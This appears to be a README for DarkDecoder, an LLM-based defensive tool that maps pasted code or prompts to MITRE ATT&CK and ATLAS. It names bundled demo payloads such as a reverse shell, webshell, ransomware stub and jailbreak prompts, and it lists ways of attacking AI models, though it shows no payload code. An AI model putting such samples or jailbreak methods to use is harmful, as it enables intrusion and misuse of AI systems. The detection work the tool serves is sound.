Dual-Framework Cyber Threat Intelligence Platform
Paste suspicious code or AI inputs. Get instant threat intelligence mapped to MITRE ATT&CK and MITRE ATLAS in under 20 seconds.
DarkDecoder is the only free tool that combines two official cyber threat frameworks β MITRE ATT&CK for traditional malware and MITRE ATLAS for AI/ML adversarial threats β in a single platform.
Security analysts waste hours manually cross-referencing malicious code against threat databases. DarkDecoder does it in 20 seconds: paste code or a suspicious prompt, get a full breakdown β danger score, technique mappings, IOCs, kill chain, remediation steps, and exportable reports.
MITRE ATLAS coverage: 40+ techniques across 13 tactics β including all LLM-specific techniques (prompt injection, jailbreak, meta-prompt extraction, plugin compromise, LLM data leakage).
- Deobfuscates base64, hex, eval chains, string concatenation
- Classifies malware type: Ransomware, Keylogger, Reverse Shell, Cryptominer, Webshell, and more
- Danger score 1β10 with full justification
- Maps to MITRE ATT&CK T-codes (T1059, T1547, T1486, etc.)
- Extracts IOCs: IPs, domains, URLs, file paths, registry keys, mutexes
- Plain English summary for non-technical stakeholders
- Actionable remediation steps
- 40+ ATLAS techniques across all 13 tactics: Reconnaissance, Resource Development, Initial Access, ML Model Access, Execution, Persistence, ML Attack Staging, Defense Evasion, Discovery, Collection, Exfiltration, and Impact
- Detects LLM-specific attacks: prompt injection (AML.T0051), jailbreak (AML.T0054), meta-prompt extraction (AML.T0058), plugin compromise (AML.T0057), LLM data leakage (AML.T0056)
- Flags training data poisoning, backdoor insertion, model extraction, membership inference
- Identifies ML supply chain attacks and surrogate model construction
- Dual-Framework mode: run both ATLAS + ATT&CK on the same input when code targets ML infrastructure
- Full 10-phase ATT&CK kill chain visualization
- Weaponization score + stealth rating (1β10)
- Privilege escalation level: None β Local β Admin β Domain Admin β SYSTEM/Root
- Detection difficulty rating + CVSS vector string generation
- Named APT group / threat actor similarity matching
- Full attack narrative from an adversary perspective
| Feature | Details |
|---|---|
| File Upload | .py .js .php .ps1 .sh .bat .rb .go .cs .vbs (up to 200 MB) |
| Report Export | PDF Β· JSON Β· TXT β one click, all modules |
| Attack Timeline | Step-by-step progression with MITRE technique IDs |
| Session History | All scans logged with timestamps in sidebar |
| Hash Analysis | SHA256 + MD5 computed on every submission |
| Built-in Samples | Pre-loaded demo payloads including GCG suffix + Crescendo escalation |
| Zero Cost | Runs entirely on Groq's free tier β no credit card |
| ATLAS Depth | 40+ techniques, 13 tactics, tactic name shown per technique |
| Component | Technology |
|---|---|
| AI Engine | Groq API β Llama 3.3 70B Versatile |
| Threat Framework 1 | MITRE ATT&CK v14 |
| Threat Framework 2 | MITRE ATLAS v4 (AI/ML adversarial threats) |
| Backend | Python 3.10+ |
| Frontend | Streamlit |
| PDF Generation | fpdf2 |
| Environment | python-dotenv |
# 1. Clone
git clone https://github.com/Pyhroff/darkdecoder
cd darkdecoder
# 2. Install dependencies
pip install -r requirements.txt
# 3. Add your free Groq API key
cp .env.example .env
# Open .env and set: GROQ_API_KEY=your_key_here
# 4. Run
streamlit run app.pyGet a free Groq API key at console.groq.com β no credit card, 14,400 requests/day free tier.
| Module | Sample Payloads |
|---|---|
| Malware Scanner | PowerShell Dropper Β· Python Reverse Shell Β· JS Cryptominer Β· PHP Webshell Β· Ransomware Stub |
| AI Threat Analyzer | Prompt Injection Β· Data Poisoning Β· Model Extraction Β· Jailbreak Β· GCG Adversarial Suffix Β· Crescendo Escalation |
| Red Team Intel | Privilege Escalation Β· Lateral Movement Β· Defense Evasion Β· C2 Beacon |
| DarkDecoder | VirusTotal | Traditional SIEMs | |
|---|---|---|---|
| MITRE ATT&CK mapping | β | Partial | β (paid) |
| MITRE ATLAS (AI threats) | β 40+ techniques | β | β |
| Red team kill chain | β | β | β |
| LLM-specific attacks | β | β | β |
| Free tier | β | β | β |
| Self-hostable | β | β | β |
darkdecoder/
βββ app.py # Main Streamlit UI (3 modules + dual-framework mode)
βββ analyzer.py # MITRE ATT&CK malware scanner
βββ ai_analyzer.py # MITRE ATLAS v4 AI threat detector (40+ techniques)
βββ redteam_analyzer.py # Red team kill chain analyzer
βββ report_generator.py # PDF report generation
βββ requirements.txt
βββ .env.example
βββ .gitignore
DarkDecoder is part of a three-project AI security portfolio:
| Project | Role | Frameworks |
|---|---|---|
| DarkDecoder | Threat intelligence β what is the attack? | MITRE ATT&CK + ATLAS |
| PromptStrike | Active red teaming β can you jailbreak it? | PAIR Β· TAP Β· Crescendo Β· GCG |
| SOC PARALLAX | Behavioral defense β detect the attacker | Neo4j Β· LangGraph Β· Ollama |
MIT License β free to use, modify, and deploy.
DarkDecoder β Because malware doesn't explain itself.